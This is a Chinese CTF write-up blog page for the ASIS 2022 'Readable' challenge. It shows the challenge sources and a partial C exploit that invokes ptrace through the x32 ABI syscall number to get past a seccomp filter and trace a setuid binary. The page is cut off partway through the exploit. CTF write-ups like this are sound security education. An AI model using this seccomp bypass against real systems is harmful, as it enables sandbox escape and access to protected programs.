

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/Nightu.png">
  <link rel="icon" href="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/Nightu.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Nightu">
  <meta name="keywords" content="Nightu CTF pwn">
  
    <meta name="description" content="源码和文档才是真 👴🏻，其他的都是假滴，冰红茶滴水  ¶前言 最近和 Strawhat 的师傅们打了 ASIS 2022 Quals，题目都挺不错的。 其中有俩道是 scanf() 的格式化字符串利用，也就是利用 %0s 实现栈溢出和利用 %9$s 实现栈上任意读入。听起来蛮离谱，但是类比 printf() 一想还是挺正常的 233，抢了个一血。再就是比赛中花了较多时间在下面这道 readab">
<meta property="og:type" content="article">
<meta property="og:title" content="ASIS CTF Quals 2022 Readable&amp;Jsy">
<meta property="og:url" content="http://n1ghtu.github.io/posts/66d9c745.html">
<meta property="og:site_name" content="Nightu">
<meta property="og:description" content="源码和文档才是真 👴🏻，其他的都是假滴，冰红茶滴水  ¶前言 最近和 Strawhat 的师傅们打了 ASIS 2022 Quals，题目都挺不错的。 其中有俩道是 scanf() 的格式化字符串利用，也就是利用 %0s 实现栈溢出和利用 %9$s 实现栈上任意读入。听起来蛮离谱，但是类比 printf() 一想还是挺正常的 233，抢了个一血。再就是比赛中花了较多时间在下面这道 readab">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/image-20221016010034466.png">
<meta property="og:image" content="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/Untitled-1665855700180-4.png">
<meta property="og:image" content="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/image-20221016020408849.png">
<meta property="og:image" content="d:/Blog/n1ghtu/source/_posts/assets/image-20221016022109570.png">
<meta property="og:image" content="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/image-20221016135122114.png">
<meta property="og:image" content="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/image-20221016023043480.png">
<meta property="og:image" content="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/image-20221016023104368.png">
<meta property="og:image" content="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/image-20221016122254774.png">
<meta property="article:published_time" content="2022-10-15T16:55:02.000Z">
<meta property="article:modified_time" content="2022-10-17T18:01:20.161Z">
<meta property="article:author" content="Nightu">
<meta property="article:tag" content="Nightu CTF pwn">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/image-20221016010034466.png">
  
  
  
  <title>ASIS CTF Quals 2022 Readable&amp;Jsy - Nightu</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"n1ghtu.github.io","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":120,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":"§"},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Nightu&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="ASIS CTF Quals 2022 Readable&amp;Jsy"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-10-16 00:55" pubdate>
          2022年10月16日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          8.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          68 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">ASIS CTF Quals 2022 Readable&amp;Jsy</h1>
            
            
              <div class="markdown-body">
                
                <blockquote><p>源码和文档才是真 👴🏻，其他的都是假滴，冰红茶滴水</p>
</blockquote>
<h2 id="前言"><a class="header-anchor" href="#前言">¶</a>前言</h2>
<p>最近和 <a target="_blank" rel="noopener" href="https://strawhat.team/">Strawhat</a> 的师傅们打了 <code>ASIS 2022 Quals</code>，题目都挺不错的。</p>
<p>其中有俩道是 <code>scanf()</code> 的格式化字符串利用，也就是利用 <code>%0s</code> 实现栈溢出和利用 <code>%9$s</code> 实现栈上任意读入。听起来蛮离谱，但是类比 <code>printf()</code> 一想还是挺正常的 233，抢了个一血。再就是比赛中花了较多时间在下面这道 <code>readable</code> 上，浅浅记录一下做题的过程。顺带复现一下没解出的 jsy。</p>
<p>把题目放在了<a target="_blank" rel="noopener" href="https://drive.google.com/file/d/1fbELLJohPDD4giarKeKmQcvDnLpcAiDV/view?usp=sharing">这里</a>，需要的师傅们可以下载 XD。</p>
<h2 id="Readable-10-solves"><a class="header-anchor" href="#Readable-10-solves">¶</a>Readable(10 solves)</h2>
<p><img src="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/image-20221016010034466.png" srcset="/img/loading.gif" lazyload alt="image-20221016010034466"></p>
<p>readable</p>
<p>Yes, you can read <strong><code>suid</code></strong> executable with <strong><code>strace</code></strong>. but what if you don’t have that?</p>
<p>Hint: <strong><a target="_blank" rel="noopener" href="https://clubby789.me/zer0pts2022/#readflag">a might-be useful blogpost</a></strong>.</p>
<h3 id="省流"><a class="header-anchor" href="#省流">¶</a>省流</h3>
<p><strong>Quesion:</strong> 在 seccomp 限制和一些其他的限制下，去获得权限为 <code>111(x)</code>  带有 suid 权限的 readme 程序中的原本的 flag。</p>
<p><strong>Answer:</strong> 利用 <code>X32 ABI</code> 绕过或者 <code>LD_PRELOAD=all sudo</code> 。</p>
<h3 id="分析"><a class="header-anchor" href="#分析">¶</a>分析</h3>
<p>题目给了俩个源码文件：</p>
<ul>
<li>
<h4 id="readme-c"><a class="header-anchor" href="#readme-c">¶</a><strong>readme.c</strong></h4>
</li>
</ul>
<p>用来输出 flag，但是每次会把 flag 🐑 成其他的字符串。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;unistd.h&gt;</span></span><br><br><span class="hljs-type">const</span> <span class="hljs-type">char</span> *flag = <span class="hljs-string">&quot;ASIS&#123;test-flag&#125;&quot;</span>; <br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span>&#123;<br>	flag = <span class="hljs-string">&quot;No flag for you&quot;</span>;<br>	<span class="hljs-built_in">puts</span>(flag);<br>	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>
<ul>
<li>
<h4 id="run-c"><a class="header-anchor" href="#run-c">¶</a><strong>run.c</strong></h4>
</li>
</ul>
<p>设置了 seccomp（🐑 掉了 ptrace 等👨🏻打👦🏻的系统调用），🐑 掉了 <code>/proc</code>，更改了 uid 和 gid 为 <code>1000(pwn)</code>，然后执行我们的 exp。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;linux/audit.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;linux/filter.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;linux/seccomp.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;linux/unistd.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stddef.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/mount.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/prctl.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/ptrace.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/syscall.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;unistd.h&gt;</span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> syscall_nr (offsetof(struct seccomp_data, nr))</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> arch_nr (offsetof(struct seccomp_data, arch))</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> ARCH_NR AUDIT_ARCH_X86_64</span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> VALIDATE_ARCHITECTURE                             \</span><br><span class="hljs-meta">  BPF_STMT(BPF_LD + BPF_W + BPF_ABS, arch_nr),            \</span><br><span class="hljs-meta">      BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, ARCH_NR, 1, 0), \</span><br><span class="hljs-meta">      BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_KILL)</span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> EXAMINE_SYSCALL BPF_STMT(BPF_LD + BPF_W + BPF_ABS, syscall_nr)</span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> DISALLOW_SYSCALL(name)                            \</span><br><span class="hljs-meta">  BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, __NR_##name, 0, 1), \</span><br><span class="hljs-meta">      BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_KILL)</span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> ALLOW_SYSCALLS BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_ALLOW)</span><br><br><span class="hljs-type">static</span> <span class="hljs-type">int</span> <span class="hljs-title function_">install_filter</span><span class="hljs-params">()</span> &#123;<br>  <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">sock_filter</span> <span class="hljs-title">filter</span>[] =</span> &#123;<br>      VALIDATE_ARCHITECTURE,<br>      EXAMINE_SYSCALL,<br>      DISALLOW_SYSCALL(ptrace),<br>      DISALLOW_SYSCALL(process_vm_readv),<br>      DISALLOW_SYSCALL(process_vm_writev),<br>      ALLOW_SYSCALLS,<br>  &#125;;<br>  <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">sock_fprog</span> <span class="hljs-title">prog</span> =</span> &#123;<br>      .len = (<span class="hljs-type">unsigned</span> <span class="hljs-type">short</span>)(<span class="hljs-keyword">sizeof</span>(filter) / <span class="hljs-keyword">sizeof</span>(filter[<span class="hljs-number">0</span>])),<br>      .filter = filter,<br>  &#125;;<br><br>  <span class="hljs-keyword">if</span> (prctl(PR_SET_SECCOMP, <span class="hljs-number">2</span>, &amp;prog)) &#123;<br>    perror(<span class="hljs-string">&quot;prctl(PR_SET_SECCOMP)&quot;</span>);<br>    <span class="hljs-built_in">exit</span>(<span class="hljs-number">1</span>);<br>  &#125;<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">char</span> **)</span> &#123;<br>  install_filter();<br>  <span class="hljs-keyword">if</span> (umount(<span class="hljs-string">&quot;/proc&quot;</span>)) &#123;<br>    perror(<span class="hljs-string">&quot;could not umount procfs&quot;</span>);<br>    <span class="hljs-built_in">exit</span>(<span class="hljs-number">1</span>);<br>  &#125;<br>  <span class="hljs-keyword">if</span> (setgid(<span class="hljs-number">1000</span>) || setuid(<span class="hljs-number">1000</span>)) &#123;<br>    perror(<span class="hljs-string">&quot;could not drop privs&quot;</span>);<br>    <span class="hljs-built_in">exit</span>(<span class="hljs-number">1</span>);<br>  &#125;<br><br>  <span class="hljs-type">char</span> *args = <span class="hljs-literal">NULL</span>;<br>  execve(<span class="hljs-string">&quot;/tmp/exploit&quot;</span>,&amp;args,&amp;args);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>&#125;<br></code></pre></td></tr></table></figure>
<p><img src="https://blog-1310088624.cos.ap-nanjing.myqcloud.com/blog/Untitled-1665855700180-4.png" srcset="/img/loading.gif" lazyload alt="Untitled"></p>
<ul>
<li><strong>Dockerfile</strong></li>
</ul>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs dockerfile"><span class="hljs-keyword">FROM</span> ubuntu:<span class="hljs-number">22.04</span><br><br><span class="hljs-keyword">COPY</span><span class="language-bash"> ./stuff/readme /home/pwn/readme</span><br><span class="hljs-keyword">COPY</span><span class="language-bash"> ./stuff/run /home/pwn/run</span><br><span class="hljs-keyword">RUN</span><span class="language-bash"> <span class="hljs-built_in">chown</span> -R root /home/pwn/*   </span><br><span class="hljs-keyword">RUN</span><span class="language-bash"> <span class="hljs-built_in">chmod</span> +x /home/pwn/run; </span><br><span class="hljs-keyword">RUN</span><span class="language-bash"> <span class="hljs-built_in">chmod</span> 111 /home/pwn/readme;</span><br><span class="hljs-keyword">RUN</span><span class="language-bash"> <span class="hljs-built_in">chmod</span> u+s /home/pwn/readme;</span><br><span class="hljs-keyword">RUN</span><span class="language-bash"> useradd pwn;</span><br><span class="hljs-keyword">CMD</span><span class="language-bash"> [<span class="hljs-string">&quot;/home/pwn/run&quot;</span>];</span><br></code></pre></td></tr></table></figure>
<h3 id="思考"><a class="header-anchor" href="#思考">¶</a>思考</h3>
<p>题目本身还是比较有意思的，给了 RCE 的机会，想办法去拿到 flag。</p>
<p>题目本身 Hint 给的阅读材料其实很有价值，通过阅读我们可以总结出一下的几个方法：</p>
<ul>
<li>利用 /proc 目录直接读（本题执行了 <code>umount(&quot;/proc&quot;)</code>，🐔）</li>
<li>利用 <code>LD_PROLOAD</code> 等环境变量，hook 掉关键函数（但是 SUID 程序一般不走这些变量）</li>
<li>利用 Ptrace 系统调用，即使没有读写权限，也能 hook 掉子进程执行时的 syscall（但是 Ptrace 好像被 ban 了）</li>
</ul>
<h3 id="Exp1-X32-ABI"><a class="header-anchor" href="#Exp1-X32-ABI">¶</a>Exp1(X32 ABI)</h3>
<p>先聊聊比赛的时候我的想法：由于我给新生赛出题塞了个类似的 Seccomp 的缘故😈，第一眼就看到 Seccomp 没有对 <code>X32 ABI</code> 的检测，那么 Ptrace ban 了等于没 ban XD，劫持掉子进程的系统调用就 ok 😎。（这不是白给吗.jpg）</p>
<p>但很傻的是，在这之前，我以为 <code>X32 ABI</code> 的调用号就是 <code>0x4000000 + SYS_number</code> 这种，对着 <code>0x40000000 + SYS_ptrace</code> 发电了好久，最后差点以为这条路走不通。</p>
<p>后来通过阅读资料，发现其实真正的系统调用号保存在 <code>/usr/include/x86_64-linux-gnu/asm/unistd_x32.h</code>：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">ifndef</span> _ASM_X86_UNISTD_X32_H</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> _ASM_X86_UNISTD_X32_H 1</span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> __NR_read (__X32_SYSCALL_BIT + 0)</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> __NR_write (__X32_SYSCALL_BIT + 1)</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> __NR_open (__X32_SYSCALL_BIT + 2)</span><br>...<br><span class="hljs-meta">#<span class="hljs-keyword">define</span> __NR_ioctl (__X32_SYSCALL_BIT + 514)</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> __NR_readv (__X32_SYSCALL_BIT + 515)</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> __NR_writev (__X32_SYSCALL_BIT + 516)</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> __NR_recvfrom (__X32_SYSCALL_BIT + 517)</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> __NR_sendmsg (__X32_SYSCALL_BIT + 518)</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> __NR_recvmsg (__X32_SYSCALL_BIT + 519)</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> __NR_execve (__X32_SYSCALL_BIT + 520)</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> __NR_ptrace (__X32_SYSCALL_BIT + 521)</span><br>...<br></code></pre></td></tr></table></figure>
<p>那么我们参考<a target="_blank" rel="noopener" href="https://clubby789.me/zer0pts2022/#readflag">原博文</a>，很容易的就可以写出以下利用 Exp：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/ptrace.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/types.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/wait.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;unistd.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;fcntl.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;errno.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/personality.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/user.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/mman.h&gt;</span></span><br><span class="hljs-type">unsigned</span> <span class="hljs-type">long</span> <span class="hljs-type">long</span> base = <span class="hljs-number">0</span>;<br><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">user_regs_struct</span> *<span class="hljs-title">regs</span> =</span> <span class="hljs-literal">NULL</span>;<br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span> *argv[])</span><br>&#123;   <br>    <span class="hljs-comment">// X32 ABI 对指针要求 32 位</span><br>    regs = mmap((<span class="hljs-type">void</span> *)<span class="hljs-number">0x233000</span>,<span class="hljs-number">0x1000</span>,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_ANONYMOUS,<span class="hljs-number">-1</span>,<span class="hljs-number">0</span>);<br>    <span class="hljs-type">pid_t</span> traced_process;<br>    <span class="hljs-type">long</span> ins;<br>    <span class="hljs-type">char</span> *argvs[] = &#123;<span class="hljs-string">&quot;/home/pwn/readme&quot;</span>,<span class="hljs-literal">NULL</span>&#125;;<br>    <span class="hljs-type">int</span> pid = fork();<br>    <span class="hljs-keyword">if</span> (pid == <span class="hljs-number">0</span>) &#123;<br>        <span class="hljs-comment">// ptrace(PTRACE_TRACEME, 0, 0, 0);</span><br>        syscall(<span class="hljs-number">0x40000209</span>,PTRACE_TRACEME, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);<br>        execve(<span class="hljs-string">&quot;/home/pwn/readme&quot;</span>, argvs, <span class="hljs-literal">NULL</span>);<br>        <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;exec failed&quot;</span>);<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;<br>    &#125;<br>    wait(<span class="hljs-literal">NULL</span>);<br>    <span class="hljs-keyword">while</span> (<span class="hljs-number">1</span>) &#123;<br>        <span class="hljs-type">int</span> blocked = <span class="hljs-number">0</span>;<br>        <span class="hljs-comment">// Wait until the child makes a syscall</span><br>        <span class="hljs-comment">// ptrace(PTRACE_SYSCALL, pid, 0, 0);</span><br>        syscall(<span class="hljs-number">0x40000209</span>,PTRACE_SYSCALL, pid, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);<br>        <br>        waitpid(pid, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);<br>        <br>        <span class="hljs-comment">// ptrace(PTRACE_GETREGS, pid, 0, &amp;regs);</span><br>        syscall(<span class="hljs-number">0x40000209</span>,PTRACE_GETREGS, pid, <span class="hljs-number">0</span>, regs);<br>        <span class="hljs-comment">// 获取程序基址，用 strace 在本地观察得到特征</span><br>        <span class="hljs-keyword">if</span>(regs-&gt;orig_rax == <span class="hljs-number">10</span> &amp;&amp; regs-&gt;rsi==<span class="hljs-number">0x1000</span>)<br>        &#123;<br>            <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Mmap Rdi:%08llx\nMmap Rsi:%08llx\nMmap Rdx:%08llx\n&quot;</span>,regs-&gt;rdi,regs-&gt;rsi,regs-&gt;rdx);<br>            base = regs-&gt;rdi;<br>        &#125;<br>        <span 